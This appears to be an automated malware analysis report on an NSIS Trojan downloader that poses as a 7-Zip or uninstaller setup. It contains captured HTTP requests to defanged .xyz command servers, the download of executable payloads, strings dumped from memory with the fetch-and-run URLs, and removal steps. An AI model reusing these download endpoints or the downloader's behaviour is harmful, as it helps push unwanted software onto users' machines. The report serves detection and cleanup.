Set-Cookie: ho_mob=eyJtb2JpbGVfZGV2aWNlX29zIjoiRGVza3RvcCIsIm1vYmlsZV9kZXZpY2VfbW9kZWwiOiJGaXJlZm94IiwibW9iaWxlX2RldmljZV9icmFuZCI6Ik1vemlsbGEiLCJtb2JpbGVfYnJvd3NlciI6IkZpcmVmb3ggRGVza3RvcCIsIm1vYmlsZV9icm93c2VyX3ZlcnNpb24iOiIyLjAiLCJtb2JpbGVfY2FycmllciI6Ij8iLCJ1c2VyX2FnZW50IjoiTW96aWxsYS81LjAgKFdpbmRvd3M7IFU7IFdpbmRvd3MgTlQgNS4xOyBGcjsgUnY6MS44LjEuMykgR2Vja28vMjAwNzAzMDkgRmlyZWZveC8yLjAuMC4zIiwiY29ubmVjdGlvbl9zcGVlZCI6ImJyb2FkYmFuZCJ9; expires=Thu, 27 Sep 2018 17:57:09 GMT; path=/;
tracking_id: 1028b4561ad9bf6688c33af9b8def1
X-Robots-Tag: noindex, nofollow
Content-Length: 338
Connection: Close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="hXXp://up.dibida-22.xyz/offer.php?affId=1006&amp;trackingId=2332413&amp;instId=11&amp;ho_trackingid=1028b4561ad9bf6688c33af9b8def1&amp;cc=UA&amp;cc_typ=ho">here</a>.</p>
</body></html>
<<< skipped >>>
POST hXXp://up.cp-int-45.xyz/installer.php?affId=1006&instId=11&ho_trackingid=1028b4561ad9bf6688c33af9b8def1&trackingId=2332413&cc=UA HTTP/1.1
Host: up.cp-int-45.xyz
Connection: close
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3
Content-Type: application/x-www-form-urlencoded
id[]=29&id[]=34&id[]=35&id[]=36&id[]=37&id[]=38&id[]=39&id[]=40&id[]=41&id[]=42&id[]=43&id[]=44&id[]=45&id[]=46&id[]=47&id[]=48&id[]=49&id[]=50&id[]=51&id[]=52&id[]=53&id[]=54&id[]=55&id[]=56&id[]=57&id[]=171&id[]=172&id[]=173&id[]=174&id[]=175&id[]=176&id[]=177
HTTP/1.1 411 Length Required
Content-Type: text/html; charset=us-ascii
Server: Microsoft-HTTPAPI/2.0
Date: Tue, 03 Nov 2015 07:17:16 GMT
Connection: close
Content-Length: 344

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "hXXp://VVV.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>Length Required</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD>
<BODY><h2>Length Required</h2>
<hr><p>HTTP Error 411. The request must be chunked or have a content length.</p>
</BODY></HTML>
(The POST above carries no Content-Length header, which is what HTTP.sys rejects with 411; the successful GET to installer.php at 07:17:16 earlier in this section carries the same id[] list in the query string instead, consistent with the client falling back to GET.)
POST hXXp://up.dibida-22.xyz/installer.php?affId=1006&instId=11&ho_trackingid=1028b4561ad9bf6688c33af9b8def1&trackingId=2332413&cc=UA HTTP/1.1
Host: up.dibida-22.xyz
Connection: close
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3
Content-Type: application/x-www-form-urlencoded
id[]=29&id[]=34&id[]=35&id[]=36&id[]=37&id[]=38&id[]=39&id[]=40&id[]=41&id[]=42&id[]=43&id[]=44&id[]=45&id[]=46&id[]=47&id[]=48&id[]=49&id[]=50&id[]=51&id[]=52&id[]=53&id[]=54&id[]=55&id[]=56&id[]=57&id[]=171&id[]=172&id[]=173&id[]=174&id[]=175&id[]=176&id[]=177
HTTP/1.1 403 Forbidden
Server: CloudFront
Date: Tue, 03 Nov 2015 07:17:11 GMT
Content-Type: text/html
Content-Length: 689
Connection: close
X-Cache: Error from cloudfront
Via: 1.1 ecc0c6e7bd06eacf696003aa79e1e25a.cloudfront.net (CloudFront)
X-Amz-Cf-Id: Kw63CdGMeEJaja0ts4373pZspdc5wtui8c5h3ljjo8no_d-md0Y3dQ==

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://VVV.w3.org/TR/html4/loose.dtd">
<HTML><HEAD><META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<TITLE>ERROR: The request could not be satisfied</TITLE>
</HEAD><BODY>
<H1>ERROR</H1>
<H2>The request could not be satisfied.</H2>
<HR noshade size="1px">
This distribution is not configured to allow the HTTP request method that was used for this request. The distribution supports only cachable requests.
<BR clear="all">
<HR noshade size="1px">
<PRE>
Generated by cloudfront (CloudFront)
Request ID: Kw63CdGMeEJaja0ts4373pZspdc5wtui8c5h3ljjo8no_d-md0Y3dQ==
</PRE>
<ADDRESS>
</ADDRESS>
</BODY></HTML>
GET /stub_maker.php?program=sevenzip&tid=4076285&pid=1505&b_typ=pe&reb=1&name=sw_uninstaller&name=sw_uninstaller&t=first HTTP/1.0
Host: dl.up-cp-23.xyz
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*
HTTP/1.1 200 OK
Content-Type: application/force-download
Content-Length: 76314
Connection: close
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.28
Content-Disposition: attachment; filename="56385f6ae869a.exe"
X-Powered-By: ASP.NET
Date: Tue, 03 Nov 2015 07:16:58 GMT
X-Cache: Miss from cloudfront
Via: 1.1 4cebe2fc1703437d8a79e556e38f6d7a.cloudfront.net (CloudFront)
X-Amz-Cf-Id: Gfpep_PWWNcDw5KV0YO4P0AMngvqMYPF3bvlV0iR8egOI_kJha4XhQ==

<<< PE executable (76314 bytes; MZ header, "This program cannot be run in DOS mode", PE signature and .text/.rdata/.rsrc section headers visible in the dump; delivered as 56385f6ae869a.exe) skipped >>>
GET /?affId=1006&appTitle=sw_uninstaller&s1=1505&s2=4076285&setupName=cpSetup&appVersion=2.92&instId=11 HTTP/1.0
Host: get.free-me-ic.xyz
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 53010
Connection: close
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Content-Transfer-Encoding: Binary
Content-Disposition: attachment; filename="cpSetup.exe"
Date: Tue, 03 Nov 2015 07:17:13 GMT
X-Cache: Miss from cloudfront
Via: 1.1 6640bb922817c1f6799f0abbff6736d3.cloudfront.net (CloudFront)
X-Amz-Cf-Id: CkZQKugoT3wUmVI0oBdQbT9y-9c9ou7hWbRboOy1lrYNi8Xw0YL8vQ==

<<< PE executable (53010 bytes; MZ header, "This program cannot be run in DOS mode", PE signature and .text/.rdata section headers visible in the dump; delivered as cpSetup.exe) skipped >>>
The Trojan connects to the servers at the following location(s):
Strings from dumps
%original file name%.exe_468:
.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
hXXp://nsis.sf.net/NSIS_Error
... %d%%
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|<>/":
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\b_setup.exe
Sdl.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nse2.tmp\NSISdl.dll
E~1\"%CurrentUserName%"\LOCALS~1\Temp\nse2.tmp
E~1\"%CurrentUserName%"\LOCALS~1\Temp\nse2.tmp\NSISdl.dll
.reloc
WS2_32.dll
NSISdl.dll
invalid URL
Host: %s
GET %s HTTP/1.0
User-Agent: NSISDL/1.2 (Mozilla)
http=
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Unable to open %s
%skB (%d%%) of %skB at %u.ukB/s
(%u hours remaining)
(%u minutes remaining)
(%u seconds remaining)
Downloading %s
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nse2.tmp
nse2.tmp
S~1\Temp\nse2.tmp\conf
l.up-cp-23.xyz/stub_maker.php?program=sevenzip&tid=4076285&pid=1505&b_typ=pe&reb=1&name=sw_uninstaller
c:\%original file name%.exe
%original file name%.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nso1.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
6648320
hXXp://dl.up-cp-23.xyz/stub_maker.php?program=sevenzip&tid=4076285&pid=1505&b_typ=pe&reb=1&name=sw_uninstaller
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46</description><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>
b_setup.exe_456:
64*46%*56
.text
`.rdata
@.data
.ndata
.rsrc
@.reloc
RegDeleteKeyExW
Kernel32.DLL
PSAPI.DLL
%s=%s
GetWindowsDirectoryW
KERNEL32.dll
ExitWindowsEx
GetAsyncKeyState
USER32.dll
GDI32.dll
SHFileOperationW
ShellExecuteW
SHELL32.dll
RegDeleteKeyW
RegCloseKey
RegEnumKeyW
RegOpenKeyExW
RegCreateKeyExW
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
invalid URL
Host: %s
GET %s HTTP/1.0
User-Agent: NSISDL/1.2 (Mozilla)
http=
Unable to open %s
%skB (%d%%) of %skB at %u.ukB/s
(%u hours remaining)
(%u minutes remaining)
(%u seconds remaining)
Downloading %s
WS2_32.dll
NSISdl.dll
KERNEL32.DLL
nsArray.dll
Join
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46.5-Unicode</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>
logging set to %d
settings logging to %d
created uninstaller: %d, "%s"
WriteReg: error creating key "%s\%s"
WriteReg: error writing into "%s\%s" "%s"
WriteRegBin: "%s\%s" "%s"="%s"
WriteRegDWORD: "%s\%s" "%s"="0xx"
WriteRegExpandStr: "%s\%s" "%s"="%s"
WriteRegStr: "%s\%s" "%s"="%s"
DeleteRegKey: "%s\%s"
DeleteRegValue: "%s\%s" "%s"
WriteINIStr: wrote [%s] %s=%s in %s
CopyFiles "%s"->"%s"
CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
Error registering DLL: Could not load %s
Error registering DLL: %s not found in %s
GetTTFFontName(%s) returned %s
GetTTFVersionString(%s) returned %s
Exec: failed createprocess ("%s")Exec: success ("%s")Exec: command="%s"
ExecShell: success ("%s": file:"%s" params:"%s")ExecShell: warning: error ("%s": file:"%s" params:"%s")=%dExch: stack < %d elements
RMDir: "%s"
MessageBox: %d,"%s"
Delete: "%s"
File: wrote %d to "%s"
File: skipped: "%s" (overwriteflag=%d)
File: error creating "%s"
File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"
Rename failed: %s
Rename on reboot: %s
Rename: %s
IfFileExists: file "%s" does not exist, jumping %d
IfFileExists: file "%s" exists, jumping %d
CreateDirectory: "%s" created
CreateDirectory: can't create "%s" - a file already exists
CreateDirectory: can't create "%s" (err=%d)
CreateDirectory: "%s" (%d)
SetFileAttributes: "%s":X
Sleep(%d)
detailprint: %s
Call: %d
Aborting: "%s"
Jump: %d
verifying installer: %d%%
unpacking data: %d%%
... %d%%
hXXp://nsis.sf.net/NSIS_Error
~nsu.tmp
install.log
%u.%u%s%s
Skipping section: "%s"
Section: "%s"
New install of "%s" to "%s"
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
*?|<>/":
invalid registry key
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
HKEY_PERFORMANCE_DATA
HKEY_USERS
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
x%c
RMDir: RemoveDirectory failed("%s")RMDir: RemoveDirectory on Reboot("%s")RMDir: RemoveDirectory("%s")RMDir: RemoveDirectory invalid input("%s")Delete: DeleteFile failed("%s")Delete: DeleteFile on Reboot("%s")Delete: DeleteFile("%s")%s: failed opening file "%s"
"C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd5.tmp\cpSetup.exe"
88/SevenZip_downloader-Qb8uuvhdf.exe
ller&producturl=http://d3pccup19xda2t.cloudfront.net/sevenzip-setup-ap.exe&productimage=http://d3pccup19xda2t.cloudfront.net/pe/szip_pub.png&productversion=9.20&producteula=http://sevenzip.info/terms.html&productsize=1.06MB&productcmd=s&publishercontact=http://sevenzip.info&productbusiness=sd,se,ad,co,prm,wsa,ita,serp,bro&antivirusPolicy=2&subid=1505&subid2=4076285
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd5.tmp\NSISdl.dll
E~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd5.tmp
E~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd5.tmp\NSISdl.dll
%Program Files%
\NSISdl.dll
\591853039
hXXp://up.ic-upp.xyz/stats.php?bu=
\nsArray.dll
ar_url
\\591853039
hXXp://up.cp-reffi.xyz/error.php?string=
hXXp://up.int-ic-4.xyz/launch_v5.php?p=sevenzip&pid=1505&tid=4076285&b_typ=pe&n=
hXXp://up.cp-doub.xyz/launch_v5.php?p=sevenzip&pid=1505&tid=4076285&b_typ=pe&n=
/key=
Nullsoft Install System (Unicode) v2.46.5-Unicode
\wininit.ini
Software\Microsoft\Windows\CurrentVersion\Internet Settings
1.1.1.6
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd5.tmp
cpSetup.exe
Exec: success (""C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd5.tmp\cpSetup.exe"")ISdl.dll"
S~1\Temp\nsd5.tmp\591853039
188/SevenZip_downloader-Qb8uuvhdf.exe
oader-Qb8uuvhdf.exe
cli/1446534132188/SevenZip_downloader-Qb8uuvhdf.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\b_setup.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp
b_setup.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsn3.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
6648320
hXXp://get.free-me-ic.xyz/?affId=1006&appTitle=sw_uninstaller&s1=1505&s2=4076285&setupName=cpSetup&appVersion=2.92&instId=11
nloader-Qb8uuvhdf.exe
hXXp://up.int-ic-4.xyz/launch_v5.php?p=sevenzip&pid=1505&tid=4076285&b_typ=pe&n=c3dfdW5pbnN0YWxsZXI=&reb=1&ic=
b_setup.exe_456_rwx_10001000_00007000:
.text
`.rdata
@.data
.rsrc
@.reloc
/key=
cpSetup.exe_1744:
.text
`.rdata
@.data
.ndata
.rsrc
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
unpacking data: %d%%
... %d%%
hXXp://nsis.sf.net/NSIS_Error
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|<>/":
\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsu8.tmp\1e5d0ed8-a824-4ba6-8ba3-12728026be4e.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsu8.tmp\1e5d0ed8-a824-4ba6-8ba3-12728026be4e.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsu8.tmp
%Program Files%
\1e5d0ed8-a824-4ba6-8ba3-12728026be4e.dll
$$\wininit.ini
<requestedExecutionLevel level='asInvoker' uiAccess='false' />
<assemblyIdentity type='win32' name='Microsoft.Windows.Common-Controls' version='6.0.0.0' processorArchitecture='x86' publicKeyToken='6595b64144ccf1df' language='*' />
KERNEL32.DLL
Stub.dll
nsu8.tmp
:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsu8.tmp
"C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd5.tmp\cpSetup.exe"
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd5.tmp
cpSetup.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsu6.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd5.tmp\cpSetup.exe
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="*" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v3.0b2</description><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/><supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/><supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/></application></compatibility></assembly>
cpSetup.exe_1744_rwx_10001000_00009000:
subid1: %s
subid2: %s
subid3: %s
subid4: %s
subid5: %s
url1: %s
url2: %s
apptitle: %S
appimgurl: %s
appsetupurl: %s
appcmd: %s
apptyurl: %s
appversion: %s
Offer path: %s
Offer retruned: %s
hXXp://
GetProcessHeap
.text
`.rdata
@.data
.rsrc
@.reloc
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
%original file name%.exe:468
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Temp\nse2.tmp\conf (121 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\b_setup.exe (7800 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nse2.tmp\NSISdl.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\nsArray.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\cpSetup.exe (6937 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\NSISdl.dll (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\591853039 (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd4.tmp (1568 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu7.tmp (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu8.tmp\1e5d0ed8-a824-4ba6-8ba3-12728026be4e.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\00080f2b.a (74 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\000814aa.a (1698 bytes)
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.